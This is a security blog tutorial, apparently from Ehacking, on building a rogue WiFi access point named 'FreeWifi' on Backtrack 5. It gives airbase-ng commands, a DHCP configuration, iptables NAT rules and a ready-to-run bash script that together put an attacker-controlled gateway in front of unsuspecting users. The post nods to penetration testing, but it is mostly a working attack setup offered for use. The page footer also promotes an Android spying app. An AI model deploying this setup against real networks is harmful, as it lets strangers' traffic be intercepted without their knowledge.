How to Create a Fake Access Point Backtrack 5

Rouge access point or a fake access point is the real threat for WiFi users, Airsnarf – Rogue Access Point and Karmetasploit- Backtrack 5 Tutorial has been discussed before and in this article I will a wonder tutorial from a wonderful that discuss how to create a fake access point on backtrack 5. There are a lot of Tutorials and Scripts for setting up a Fake AP,  The “Gerix”  tool also have an option to auto set a Fake AP (for some reason this tool never worked for me).
I started to setup my fake AP and had run into some trouble for a strange reason.
I decided to put my experience here hopefully you’ll find it useful.
Started by putting my Wlan interface in monitor mode
[email protected]:~/fakeap# airmon-ng start wlan1
Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID     Name
1558    dhclient
Interface       Chipset         Driver
wlan1           Realtek RTL8187L        rtl8187 - [phy1]SIOCSIFFLAGS: Unknown error 132
                                (monitor mode enabled on mon0)
I noticed the following error: “Unknown error 132?
Tried using airodump-ng to see what happens…

[email protected]:~/fakeap# airodump-ng mon0
ioctl(SIOCSIFFLAGS) failed: Unknown error 132
Got the same error.
The solution was simply to unload the RTL8187 and Load the R8187 driver instead as follows:
[email protected]:~/fakeap# rmmod rtl8187
[email protected]:~/fakeap# modprobe r8187
Tried putting wlan In monitor mode again
[email protected]:~/fakeap# airmon-ng start wlan1
Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID     Name
1558    dhclient
Interface       Chipset         Driver
wlan1           RTL8187         r8187 (monitor mode enabled)
Well, that fixed the problem
[email protected]:~/fakeap# iwconfig
lo        no wireless extensions.
eth3      no wireless extensions.
wlan1     802.11b/g  Mode:Monitor  Channel=10  Bit Rate=11 Mb/s
          Tx-Power=5 dBm
          Retry:on   Fragment thr:off
          Link Quality=0/100  Signal level=50 dBm  Noise level=-156 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0
Now we can proceed to the fake ap setup process
1. Install a DHCP Server
apt-get install dhcp3-server
2. Edit “/etc/dhcp3/dhcpd.conf” as follows (You can change ip address, pool and dns server as needed):
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 10.0.0.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 10.0.0.255;
option routers 10.0.0.254;
option domain-name-servers 8.8.8.8;
range 10.0.0.1 10.0.0.140;
}
3. Put your wlan in monitor mode
airmon-ng start wlan1
4. Start airbase-ng, you will need to specify the AP SSID and channel number
airbase-ng -e FreeWifi -c 11 -v wlan1 &
5. Airbase will create a new adapter “at0? you will need to enable it and assign it with an ip address and subnet mask, the ip address you assign to this interface will be the default gateway that you specified in the dhcpd.conf file.
ifconfig at0 up
ifconfig at0 10.0.0.254 netmask 255.255.255.0
6. Add a route
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254
7. Setup ip tables
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
• Eth3 is my external interface which is connected to the internet change it to whatever yours is
iptables -t nat -A POSTROUTING -o eth3 -j MASQUERADE
8. Clear dhcp leases
echo > '/var/lib/dhcp3/dhcpd.leases'
9. Create a symlink to dhcpd.pid (skipping this may cause an error when starting dhcp server)
ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid
10. Start the DHCP server
dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 &
11. Don’t forget to enable IP forwarding
echo "1" > /proc/sys/net/ipv4/ip_forward
That’s All Folks!
I have created a simple bash script to automate this process you will just need to change it  to suit your configuration.

#!/bin/bash

echo “Killing Airbase-ng…”
pkill airbase-ng
sleep 2;
echo “Killing DHCP…”
pkill dhcpd3
sleep 5;

echo “Putting Wlan In Monitor Mode…”
airmon-ng stop wlan1 # Change to your wlan interface
sleep 5;
airmon-ng start wlan1 # Change to your wlan interface
sleep 5;
echo “Starting Fake AP…”
airbase-ng -e FreeWifi -c 11 -v wlan1 & # Change essid, channel and interface
sleep 5;

ifconfig at0 up
ifconfig at0 10.0.0.254 netmask 255.255.255.0 # Change IP addresses as configured in your dhcpd.conf
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254

sleep 5;

iptables –flush
iptables –table nat –flush
iptables –delete-chain
iptables –table nat –delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o eth3 -j MASQUERADE # Change eth3 to your internet facing interface

echo > ‘/var/lib/dhcp3/dhcpd.leases’
ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid
dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 &

sleep 5;
echo “1” > /proc/sys/net/ipv4/ip_forward



The over all credit goes to Exploit KB


Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription  or become our Facebook fan! You will get all the latest updates at both the places.
Ehacking Staff
With more than 50 global partners, we are proud to count the world’s leading cybersecurity training provider. EH Academy is the brainchild of Ehacking, which has been involved in the field of training since the past Five years and continues to help in creating professional IT experts.

Most Popular

Top 10 things to Do After Installing Kali Linux

Kali Linux is considered to be one of the best hacking distribution of this era, it is developed by Offensive Security to give an...

Become a spy in your own right with Xnspy Android spying app

Having become widely popular among parents and employers, spying apps have become quite the norm nowadays. Android spying apps have made it a lot...

e-Services Portals Potentially Expose Government Infrastructure to File-based Attacks

More and more users are embracing technology to perform their day-to-day activities. It’s not only private businesses that are forced to establish digital channels...

What is Nmap? How to use Nmap for Information Gathering

Nmap stands for Network Mapper, a powerful network scanning and host detection tool that is being used to perform reconnaissance in a very first...